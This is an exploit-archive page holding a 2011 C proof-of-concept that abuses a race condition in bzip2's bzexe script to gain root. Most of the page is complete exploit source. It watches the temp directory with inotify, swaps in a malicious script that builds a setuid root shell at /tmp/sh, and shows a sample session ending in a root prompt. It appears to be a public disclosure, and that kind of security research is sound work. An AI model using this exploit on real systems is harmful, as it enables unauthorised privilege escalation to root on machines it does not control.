exploit the possibilities

bzip2 (bzexe) Race Condition

bzip2 (bzexe) Race Condition
Posted Nov 23, 2011
Authored by vladz

This proof of concept exploits a race condition in the bzexe script in order to gain a root shell.

tags | exploit, shell, root, proof of concept
MD5 | d350cd0ce71b49ce8739b3c99b526833

bzip2 (bzexe) Race Condition

Change Mirror Download
/* bzexec_PoC.c -- bzip2 (bzexe) race condition PoC

Author: vladz (http://vladz.devzero.fr)
Tested on: Debian 6.0.3 up to date (bzip2 version 1.0.5-6)

This PoC exploits a race condition in the bzexe script. This tool is
rarely used so I wasn't supposed to write an exploit. But some people
on the full-disclosure list had doubts about this exploitation. Public
discussion about this issue started from this post:
http://seclists.org/fulldisclosure/2011/Oct/776.

I am using Inotify to win the race (on my dual-core, it succeed 100%).

Usage: ./bzexe_PoC <command_name>

For instance, if "/bin/dd" has already been compressed with bzexe,
launch:

$ ./bzexe_PoC dd
[*] launching attack against "dd"
[+] creating evil script (/tmp/evil)
[+] creating target directory (/tmp/dd)
[+] initialize inotify
[+] waiting for root to launch "dd"
[+] opening root shell
# whoami
root
*/
#define _GNU_SOURCE
#include <sys/inotify.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <fcntl.h>


int create_nasty_shell(char *file) {
char *s = "#!/bin/bash\n"
"echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
"cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
"chmod 4755 /tmp/sh; rm -f ${0}; ${0##*/} $@\n";

int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
write(fd, s, strlen(s));
close(fd);

return 0;
}


int main(int argc, char **argv) {
int fd, wd;
char buf[1], *targetpath,
*evilsh = "/tmp/evil", *trash = "/tmp/trash";

if (argc < 2) {
printf("usage: %s <cmd name>\n", argv[0]);
return 1;
}

printf("[*] launching attack against \"%s\"\n", argv[1]);

printf("[+] creating evil script (/tmp/evil)\n");
create_nasty_shell(evilsh);

targetpath = malloc(sizeof(argv[1]) + 6);
sprintf(targetpath, "/tmp/%s", argv[1]);

printf("[+] creating target directory (%s)\n", targetpath);
mkdir(targetpath, S_IRWXU|S_IRWXG|S_IRWXO);

printf("[+] initialize inotify\n");
fd = inotify_init();
wd = inotify_add_watch(fd, targetpath, IN_CREATE);

printf("[+] waiting for root to launch \"%s\"\n", argv[1]);
syscall(SYS_read, fd, buf, 1);
syscall(SYS_rename, targetpath, trash);
syscall(SYS_rename, evilsh, targetpath);

inotify_rm_watch(fd, wd);

printf("[+] opening root shell (/tmp/sh)\n");
sleep(2);
system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");

return 0;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    3 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close